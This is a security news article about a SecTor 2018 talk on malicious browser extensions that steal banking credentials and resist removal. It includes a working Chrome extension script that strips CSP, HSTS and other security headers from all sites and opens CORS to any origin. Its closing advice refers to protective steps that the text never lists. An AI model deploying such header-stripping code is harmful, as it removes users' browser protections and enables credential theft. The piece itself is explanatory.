You may trust your browser, but do you trust what it’s running? At SecTor 2018, threat intelligence specialist Lilly Chalupowski demonstrated why you shouldn’t.
Browser extensions are the small applications that your browser installs to provide extra features, anything from translating web sites to letting you download videos from streaming sites. They can also be a serious security problem.
When your best friend brings a new friend of theirs to your party, you assume that this new person will be well behaved. Most of the time, you’ll be right, because you trust your friend’s character judgements.
Trust no one
Browsers and extensions work the same way. Your operating system already trusts the browser, which means it also trusts whatever extra software the browser brings to the party, just as you do when you open the door to your best friend and their +1.
Occasionally, though, things go wrong. You’ll find that new party guest cooking crystal meth in your bathroom having broken open and pocketed your framed collection of memorial coins. Awkward.
As a security application developer in threat intelligence at GoSecure, Chalupowski spends her days thinking her way inside attackers’ heads. Her experience as a penetration tester has made her adept at identifying and documenting new attack vectors.
Google tries to protect you from malicious extensions in its Chrome browser. Chrome enforces protections such as Content Security Policy (CSP), sandboxing, and the same-origin policy with Cross-Origin Resource Sharing (CORS), which lets a site declare which other origins may read its responses. Web sites send CSP, CORS and similar security headers to govern what a page may load and where it may send information, and those headers are what limit the damage code running inside the browser, extensions included, can do.
Overriding security headers
Chalupowski blew right through those measures in her talk at SecTor 2018 using little more than a simple script.
“I can nuke what’s there and take it all out,” she says. “I thought there would have been something to prevent that but there’s not.”
She then established communication between the malicious extension and a command-and-control (C&C) server, sending login credentials from a banking site in plain text. She was also able to send malicious code from the C&C server back to the browser, which in her demo triggered an alert box.
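The page does not reproduce Chalupowski's script, so as an added illustration of the mechanism (not her code, and not Google's), the following Manifest V2 background script shows how an extension holding the webRequest and webRequestBlocking permissions can delete a site's security headers before the page ever sees them. The header list, the CORS rewrite and the manifest fragment are this example's own assumptions about what such a script needs; the header-rewriting functions are pure so they also run under Node.

```javascript
// Added example: stripping security headers with Chrome's blocking webRequest
// API (Manifest V2). Not the SecTor talk's script; the header list, the CORS
// rewrite and the manifest fragment below are assumptions.
//
// manifest.json (MV2) would need at least:
//   "permissions": ["webRequest", "webRequestBlocking", "<all_urls>"],
//   "background": { "scripts": ["background.js"] }

// Response headers that restrict what a page may load, frame, or send.
const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "x-content-type-options",
  "strict-transport-security",
  "referrer-policy",
  "cross-origin-opener-policy",
  "cross-origin-embedder-policy",
  "cross-origin-resource-policy",
]);

// Chrome passes details.responseHeaders to the listener as [{name, value}].
// Whatever array the listener returns under {responseHeaders} is what the
// renderer sees, so dropping entries here removes the policy entirely.
function stripSecurityHeaders(responseHeaders) {
  const kept = [];
  const removed = [];
  for (const h of responseHeaders) {
    if (SECURITY_HEADERS.has(h.name.toLowerCase())) {
      removed.push(h.name);
    } else {
      kept.push(h);
    }
  }
  return { responseHeaders: kept, removed };
}

// Instead of deleting CORS, replace it with a wildcard so any origin can read
// the response. Browsers reject "*" for credentialed fetches, so abuse that
// needs cookies would echo the requesting Origin instead (not shown).
function relaxCors(responseHeaders) {
  const out = responseHeaders.filter(
    (h) => h.name.toLowerCase() !== "access-control-allow-origin"
  );
  out.push({ name: "Access-Control-Allow-Origin", value: "*" });
  return out;
}

// Extension wiring; guarded so this file also loads outside the browser.
if (typeof chrome !== "undefined" && chrome.webRequest) {
  chrome.webRequest.onHeadersReceived.addListener(
    (details) => {
      const { responseHeaders } = stripSecurityHeaders(details.responseHeaders);
      return { responseHeaders: relaxCors(responseHeaders) };
    },
    { urls: ["<all_urls>"] },
    ["blocking", "responseHeaders"]
  );
}
```

The same capability is what ad blockers and "disable CSP" developer tools use legitimately, so the permission pair alone is a signal, not proof of malice. Chrome's Manifest V3 removes blocking webRequest for ordinary extensions in favour of declarativeNetRequest, but that API's modifyHeaders rules can still remove response headers, so the attack surface narrows rather than disappears.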
We sat down with Chalupowski to talk more about what she found:
Google does its best to check for malicious extensions in the Chrome Web Store, using machine learning. Nevertheless, some still slip through and compromise thousands of users, effectively turning the Chrome Web Store into a massive watering hole.
In one such case, researchers found a malicious add-on called Tiempo en colombia en vivo which, just like our unwanted party guest, refused to leave. It proved almost impossible to remove because it used a simple redirect to block users from reaching the browser's list of installed extensions.
Often, crooks use social engineering techniques such as phishing to get these extensions onto unwitting users' systems. One such scam, posing as an anti-cryptojacking extension, was found stealing victims' private cryptocurrency keys in March 2019.
How to protect yourself
These steps alone aren't enough, though. The fact that no one has found malicious activity in an extension doesn't mean that it doesn't exist. For extra protection, limit the number of extensions you install and regularly review those already installed to see whether you still use them. Reducing your attack surface is an important step for any browser user.